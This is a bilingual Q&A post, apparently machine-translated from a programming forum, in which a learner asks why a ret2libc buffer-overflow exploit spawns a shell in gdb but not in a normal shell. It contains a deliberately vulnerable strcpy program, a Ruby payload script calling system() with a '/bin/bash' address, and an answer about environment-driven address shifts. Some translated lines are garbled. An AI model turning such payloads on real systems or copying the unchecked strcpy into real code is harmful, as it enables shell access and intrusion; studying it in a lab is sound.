[英]Ret2libc exploit works in gdb, but in normal shell gives error sh: 1: g:0:1: not found
I am learning about ret2libc buffer overflow exploits to bypass NX. 我正在学习ret2libc缓冲区溢出漏洞绕过NX。
My vulnerable code (vuln.c): 我的易受攻击的代码(vuln.c):
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char *argv[])
{
char buffer[512];
if (argc != 2)
printf("NO\n");
else {
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
}
}
Compiled with this command: # gcc -o vuln vuln.c
使用以下命令进行编译:
# gcc -o vuln vuln.c
I then created this simple ret2libc exploit in ruby (exploit.rb): 然后,我在ruby(exploit.rb)中创建了这个简单的ret2libc利用:
p = "A"*524
p += [0xb7e9ef10].pack('<I') # system()
p += [0xb7e79e46].pack('<I') # nomal ret val
p += [0xbffff75a].pack('<I') # "/bin/bash"
print(p)
If it run it in gdb with (gdb) r $(ruby exploit.rb)
it gives me a nice bash shell. 如果它在
(gdb) r $(ruby exploit.rb)
在gdb中运行,它将为我提供一个不错的bash shell。
I then try to run it in a normal shell with # ./vuln $(ruby exploit.rb)
, but instead of giving me a shell it gives me this instead: sh: 1: g:0:1: not found
然后,我尝试使用
# ./vuln $(ruby exploit.rb)
在普通的shell中运行它,但是# ./vuln $(ruby exploit.rb)
给我一个shell, # ./vuln $(ruby exploit.rb)
给我一个它: sh: 1: g:0:1: not found
ASLR is disabled and the only protection enabled is NX, I think. 我认为ASLR已禁用,唯一启用的保护是NX。
Any help is appreciated. 任何帮助表示赞赏。
Edit: 编辑:
I am running this on i686 in case that helps. 我在i686上运行此程序以防万一。
The reason for shifting is the execution environment. 转移的原因是执行环境。
user@feynman:~$ ./getenv PWN
PWN ("/home/user/pwn") is at 0xbfffff82
user@feynman:~$ /home/user/getenv PWN
PWN ("/home/user/pwn") is at 0xbfffff70
Here the way of launching getenv is affecting address of the PWN . 在这里启动getenv的方式会影响PWN的地址。
You achieved code execution but the address of the SHELL env var
is off. 您已完成代码执行,但
SHELL env var
的地址已关闭。 Try [address of shell in gdb] + 4
, or in gdb, x/s 0xbffff75a+4.
尝试
[address of shell in gdb] + 4
,或者在gdb, x/s 0xbffff75a+4.
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.